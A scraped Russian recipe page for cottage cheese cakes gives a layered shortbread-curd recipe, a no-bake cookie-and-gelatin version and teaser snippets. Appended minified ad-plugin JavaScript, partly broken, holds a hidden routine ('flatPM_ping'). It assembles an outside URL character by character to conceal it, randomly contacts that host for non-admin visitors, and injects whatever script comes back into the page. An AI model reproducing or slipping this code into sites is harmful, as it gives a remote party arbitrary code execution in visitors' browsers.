Творожный торт

Творожный торт

Хотите приготовить творожный торт и ищите оригинальный рецепт? Тогда вы попали по адресу. Нежнейший творожный торт с малиновой начинкой – это невероятная вкусность! .

Этот десерт непросто вкусный, он еще и диетический! Творожный шоколадный чизкейкмогут позволить себе даже те, кто следит за своей фигурой. Приготовить такую вкусность проще простого. .

Не любите возиться с приготовление десертов? Вас кидает в дрожь при слове «духовка»? Тогда рецепт этого творожного торта то, что вам надо! Творожно-карамельный торт предельно прост в приготовлении. И вкусен – до безумия! .

Этот торт я готовлю очень часто, так как моя семья его обожает. Для приготовления можно использовать любые ягоды. В этот раз у меня торт с клубникой. Ягодный торт с творожной прослойкой невероятно вкусный. В нем идеальное сочетание творога, коржа .

Хотите всех удивить? Приготовьте творожный торт по рецепту венгерской кухни. Такой торт будут уплетать даже те, кто не любит блюда с творогом! .

Я частенько готовлю торты из печенья – это просто, быстро, вкусно. Один из моих любимых – вот такой торт из печенья с заварным кремом. Приготовление десерта – элементарное! Готовить можно с любым печеньем, но моим детишкам больше всего нравится .

Этот торт вызовет настоящий фурор! Десерт обалденно красивый и не только. Вишневый творожный торт-желе тает во рту, его вкус невозможно забыть. Приготовьтесь слушать комплименты от всех гостей! .

Я очень люблю творожное тесто. И не только за его простоту, а и за то, что я могу разнообразить своим детишкам меню. Малышам не всегда кажутся аппетитными вареники, запеканка или сырники. Зато творожные пирожные, рогалики, плюшки, булочки и торты они .

Когда я узнала о рецепте этого творожного торта, то подумала: «Какая ерунда! Из топора кашу приготовить невозможно». Ну, или как в сказке, что здесь есть какой-то подвох. Но меня заинтересовало! Приготовив, я поняла, что чудо возможно. Творожный торт .

Если у вас есть вишни (свежие или замороженные), обязательно приготовьте этот творожный торт. Это просто наслаждение! Творожный торт с вишнями не оставит никого равнодушными – просто пальчики оближите! .

Торт творожный

  • Тесто
  • 200г маргарина или сливочного масла
  • 3 желтка
  • 1 стакан сахара
  • мука
  • Крем
  • 1 пачка сливок
  • 3 яичных белка
  • 2 пачки 9% творога
  • 1 стакан сахара

1.для теста-200 гр. маргарина или сливочного масла,3 желтка,1 стакан сахара

2.для крема-Пачка сливок ,белки от 3 яиц,2 пачки 9% творога и 1 стакан сахара

готовим 2 коржа

( как выпекать и какая температура смотрим ЗДЕСЬ )

один из коржей,желательно сразу выпекать в форме,куда в последствие будет добавлен крем,дно формы надо

хорошо промазать маслом и посыпать мукой

второй корж может быть безформленный ,так как он пойдет на крошку.

Тщательно взбиваем белки,до того момента пока они не начнут держать форму

добавляем сливки и сахар,и продолжаем тщательно взбивать миксером на большой скорости

после этого снижаем скорость и добавляем творог-теперь уже достаточно только хорошо все перемешать

выкладываем крем в форму с коржом и разравниваем по всей поверхности

второй корж ,надо растолочь в крошку и засыпать крем сверху,равномерно распределяя по всей поверхности

крошки желательно чуть придавить

вот вид с боку,хорошо видно все 3 слоя

ну и вид с верху 🙂

как и любой тортик на основе песочного теста -он должен хорошо промокнуть, поэтому-в холодильник его на ночь.

на этом можно было бы и закончить,но жена сказала еще одну очень интересную вешь

Для тех ,кто не хочет возиться с песочным тестом ,выпечкой ,духовкой и т.д.-есть простой выход

Можно использовать обычное печенье,

нижний слой -перед укладкой печенье нужно обмакнуть в молоко

Творожный торт

Красивый и аппетитный творожный торт – это настоящее украшение праздничного стола. Приготовить его можно двумя способами: испечь в духовке или заморозить.

Основа для такого торта может быть как бисквитной, так и песочной. Песочную основу можно делать, перетерев рассыпчатое печенье с размягченным сливочным маслом. Торт из творога с бисквитной основой отличается воздушностью и нежным вкусом.

Для творожного слоя подойдет свежий жирный творог, протертый через мелкое сито или взбитый в блендере. Сливки, добавленные в творожную массу, придадут дополнительную нежность такому лакомству.

Вкусные и необычные торты из творога получаются, если добавить в них кусочки сладких фруктов или ягоды. В качестве добавок часто используют мед, мак, орехи и цитрусовые, а покрывают торт слоем густого желе.

Любителям шоколадных десертов понравится приготовление творожного торта с добавлением какао или топленого шоколада. Если сделать шоколадным и нижний слой, а сверху готовый бисквит полить помадкой, то насыщенный шоколадный вкус такой выпечки не оставит равнодушным никого.

Шоколадно-творожный торт

Любите делать торты в домашних условиях? Это говорит о вас, как об очень неравнодушной хозяйке – ведь сейчас гораздо проще купить торт в магазине. Но

Творожно-йогуртовый торт

Наконец, на смену долгой зиме приходит весна, не успеешь оглянуться, как настанет летняя пора. Многие женщины в это время становятся особенно придирчивы к своей фигуре

Творожно-клубничный торт

Творожно-клубничный торт — это потрясающе вкусный и не менее красивый десерт, который понравится даже самым требовательным дегустаторам. Для его приготовления понадобится: 1. Испечь бисквит. Белки

Творожный торт с желатином

Приготовить самостоятельно праздничный торт, вкусный и красивый, не так уж сложно. Пример этому — творожный торт с желатином, состоящий из нежного бисквита, воздушного творожного слоя

Клубнично-творожный торт

Готовить вкусные и красивые торты под силу любой хозяйке. Клубнично-творожный торт выглядит очень празднично, имеет нежный клубнично-творожный привкус с легкой кислинкой. Ингредиенты: куриные яйца –

Творожный торт-суфле

Если вы хотите приготовить творожный торт-суфле, то вам пригодится следующий рецепт. Для бисквитного теста – 3 яйца, 100 грамм сахара, 50 грамм сливного масла, 200

Бисквитно-творожный торт

Для того, чтобы правильно приготовить бисквитно-творожный торт в домашних условиях, вам потребуется руководствоваться достаточно сложным рецептом. Ингредиенты для бисквита — 3 яйца, полстакана муки, полстакана

Творожно-персиковый торт

Если вы хотите приготовить вкусный творожно-персиковый торт дома, обратите внимание на следующий рецепт. Вам потребуется 4 пачки творога, 3 штуки готовых бисквитных коржей, 1 банка

Торт творожный с печеньем

Из творога можно приготовить большое количество разнообразных угощений, и, в основном, эти вкусные блюда не требуют опыта и много времени для приготовления. Специально для начинающих

Творожные коржи для торта

Торты, приготовленные в домашних условиях, ничем не уступают покупным. И очень часто в семьях какой-нибудь рецепт торта передается от мамы к дочке, становясь традицией. Предлагаю

Торт из творога – самый простой рецепт приготовления в домашних условиях

Творожный торт с печеньем без выпечки – самый, пожалуй, простой способ приготовить изысканный домашний десерт с минимальными усилиями и максимальным результатом. Торт из творога имеет настолько простой рецепт, что с его приготовлением в домашних условиях справится кто угодно.

Кстати, это отличный вариант для интересного и поучительного времяпровождения с детьми и повод научить их, как сделать торт из творога. Впоследствии они и сами смогут его готовить и будут рады сделать к празднику творожный тортик.

  • Время приготовления: 6 часов на застывание.
  • Кухонная техника и утварь: форма разъемная, пищевая пленка, блендер, сито для протирания творога, миска для смешивания основы и начинки, кастрюлька и миска для желе, ложка.

Необходимые продукты

Для основы:

Печенье овсяное 300 г
Масло сливочное 200 г

Для покрытия:

Желатин вишневый 1 упаковка
Ягоды, листья мяты По вкусу
Ягоды, листья мяты 1 ч. л.

Для начинки:

Творог мягкий 800 г
Сахар 150 г
Сметана 100 г
Желатин 15 г
Вода 50 мл

Особенности выбора продуктов

Печенье в торт из творога не обязательно использовать овсяное, можно взять любое, какое вам нравится.

Творог лучше предпочесть мягкий, чтобы легко протирался.

Можно выбирать молочные продукты с маленьким процентом жирности, но следует учесть, что чем они жирнее, тем вкуснее конечный результат.

Как приготовить торт из творога в домашних условиях

Торт из творога и печенья готовится без выпечки, благодаря этому существует масса вариантов его оформления.

Принцип, по которому готовится творожный торт, очень прост: поскольку он делается без выпечки, основой служит смесь масла или сгущенки с печеньем.

Продолжая сооружать торт, вторым слоем делаем смесь из творога, сметаны, сахара и желатина с добавлением фруктов, ароматов, красителей и так далее – зависит от того, какой рецепт.

Расскажу, как легко приготовить творожный торт, вот простой рецепт с фото и описанием этапов пошагово.

Этот творожный торт я попробовала в гостях у подруги, которая сказала, что готовится он без выпечки, и дала мне журнал, где был рецепт с фото.

Очень скоро на день рождения мне понадобился торт, желательно домашний, потому что он предназначался для детей, и я вспомнила про этот восхитительный творожный десерт. В самый первый раз я готовила шоколадно-творожный торт, внеся изменения в рецепт, но с фото не успела, он был съеден моментально.

Быстрый как в приготовлении, так и в поедании, этот торт из творога готовится очень легко.

Готовим основу.

Печенье раскрошить и смешать с мягким сливочным маслом.

Размолоть блендером. Масса получается не рассыпчатой, благодаря маслу.

В застеленную пищевой пленкой форму выложить основу, утрамбовать равномерно по всей площади.

Рецепт крема для торта из творога

Для кремовой начинки перетереть творог с помощью блендера или сита.

Смешать со сметаной и сахаром. Желатин развести согласно инструкции, остудить и ввести в массу.

Перемешать до однородной консистенции.

Собираем торт. На основу выложить творожно-сметанно-сахарно-желатиновую смесь, распределить по всей поверхности слоя из печенья.

Пока готовится желе, отправить заготовку на холод, чтобы немного остыла.

Приготовить желе, используя воды на 20% меньше указанного в инструкции на упаковке, остудить до комнатной температуры.

Залить охлажденный торт готовым желе, дать застыть.

Как красиво оформить и подать творожный торт

Залив торт слоем желатина, даем ему застыть, выкладываем сверху свежие ягоды, листики мяты, можно припорошить сахарной пудрой с помощью ситечка.

Советы и рекомендации по приготовлению торта

Существует огромное количество вариантов приготовления творожного торта при соблюдении базового принципа: основа, сладкая творожно-кисломолочная начинка с желатином и верхний фруктово-ягодный слой (можно и без него).

  • Можно использовать не крошки от печенья с маслом, как в оригинале, а испечь бисквит в качестве основы, тогда творожный торт будет не таким калорийным.
  • Можно сделать совсем легкий творожный торт, используя какую-то диетическую основу, обезжиренные творог и йогурт, заменители сахара и свежие фрукты.
  • Крошки можно скреплять с помощью размягченного масла или вареной сгущенки, которая имеет вязкую консистенцию. Масло и сгущенку можно брать пополам, добавив орехи, как при изготовлении шоколадной колбасы.
  • Торт из творога может быть шоколадным, причем количество шоколада тоже можно варьировать: шоколадное печенье для основы, натертый шоколад или какао в крем, шоколадная глазурь сверху, – как душе угодно.
  • В творожный торт можно добавлять любые фрукты, орехи, ягоды, сухофрукты – по сезону и собственному вкусу.
  • Творожный торт не обязательно делать в три базовых слоя, тесто и творог можно чередовать, например: печенье, творожная масса, шоколадное печенье, творожная масса с вишней, желе.
  • Печенье не обязательно измельчать, можно подобрать подходящее по форме и уложить слоями, промазывая творожной массой.

Видеорецепт торта из творога

Автор видео готовит творожный торт из шоколадного печенья без выпечки. Показано, как приготовить многослойный торт с начинкой из творога и сметаны с добавлением желатина. Поэтапно продемонстрированы технология и нюансы приготовления. Вкусный творожный торт, эффектно украшенный ягодами и листьями мяты, выглядит нарядно и изысканно.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};